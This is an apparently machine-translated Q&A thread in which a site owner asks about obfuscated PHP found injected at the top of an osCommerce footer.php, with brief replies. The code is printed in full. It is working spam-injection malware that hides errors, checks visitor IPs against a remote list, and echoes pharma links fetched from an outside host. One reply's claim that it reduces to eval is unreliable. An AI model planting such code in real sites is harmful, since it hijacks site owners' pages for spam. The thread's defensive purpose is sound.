我正在查看某个网站已被某人/某事利用。该网站注入了一系列链接,链接到制药公司,谁知道还有什么。页脚顶部有很多链接。我现在只能在雅虎索引中的缓存页面上找到它们。谷歌仍然不满意该网站,而现场网站不再显示任何链接。这是一个客户..所以我主要知道我被告知,我能找到其他明智的。此代码是一个漏洞利用?这段代码是什么?
我发现这个代码在footer.php的非常“尖端/顶部”(这是一个OsCommerse网站):
<?php $x13="cou\156\x74"; $x14="\x65\x72\162\x6fr\x5f\x72ep\157\162\164ing"; $x15="\146\151l\x65"; $x16="\146i\154\145_g\x65t\x5f\x63\x6fn\164\145n\164s"; $x17="\163\x74rle\156"; $x18="\163tr\160o\x73"; $x19="su\x62\x73\164\162"; $x1a="tr\151m";
ini_set(' display_errors','off');$x14(0);$x0b = "\150t\x74p\x3a\057\057\x67\145n\x73h\157\x70\056org/\163\x63\162ipt\057\155a\163k\x2e\x74x\x74";$x0c = $x0b; $x0d = $_SERVER["\x52E\115O\124\105_A\104\104\122"]; $x0e = @ $x15($x0c); for ($x0f = 0; $x0f < $x13($x0e); $x0f++) {$x10 = $x1a($x0e[$x0f]);if ($x10 != ""){ if (($x11 = $x18($x10, "*")) !== false) $x10 = $x19($x10, 0,$x11); if ($x17($x10) <= $x17($x0d) && $x18($x0d, $x10) === 0) { $x12 =$x16("\150\164\164\160\x3a/\057g\145\x6e\x73\x68o\160\056o\162\x67\057\160aral\x69\x6e\x6b\x73\x2f\156e\167\x2f3\057\x66\145e\144\x72\157lle\x72\x2e\143\x6f\x6d\x2e\x74\170\x74"); echo "$x12"; } }}echo "\x3c\041\055\x2d \060\x36\071\x63\x35b4\x66e5\060\062\067\146\x39\x62\0637\x64\x653\x31d2be5\145\141\143\066\x37\040\x2d-\076";?>
当我查看有“坏”链接源缓存的网页,这段代码适合我在footer.php源代码中找到它的地方。对谷歌的一点研究表明,在那里有类似代码的漏洞。
你怎么想,当我自己的服务器上运行它,我得到的是源只有像这样的呼应评论:
<!-- 069c5b4fe5027f9b37de31d2be5eac67 -->
我不想只是匆匆删除代码和只因为它看起来很糟糕而说'你的好',尤其是因为我没有立即知道'坏链接'已经消失。顺便说一句,这些链接都会转到一个死链接。
这只是一个加密的数据attaced。 – Racooon 2011-05-31 18:59:23
是的,它是利用代码。故意混淆以使其“很难”看到它的功能。一旦你浏览了混淆层,它就会归结为像'eval($ do_something_nasty)'这样的东西。 – 2011-05-31 19:01:32
'echo -n'primitive'| md5#=> 069c5b4fe5027f9b37de31d2be5eac67' :) – zoul 2011-05-31 19:01:37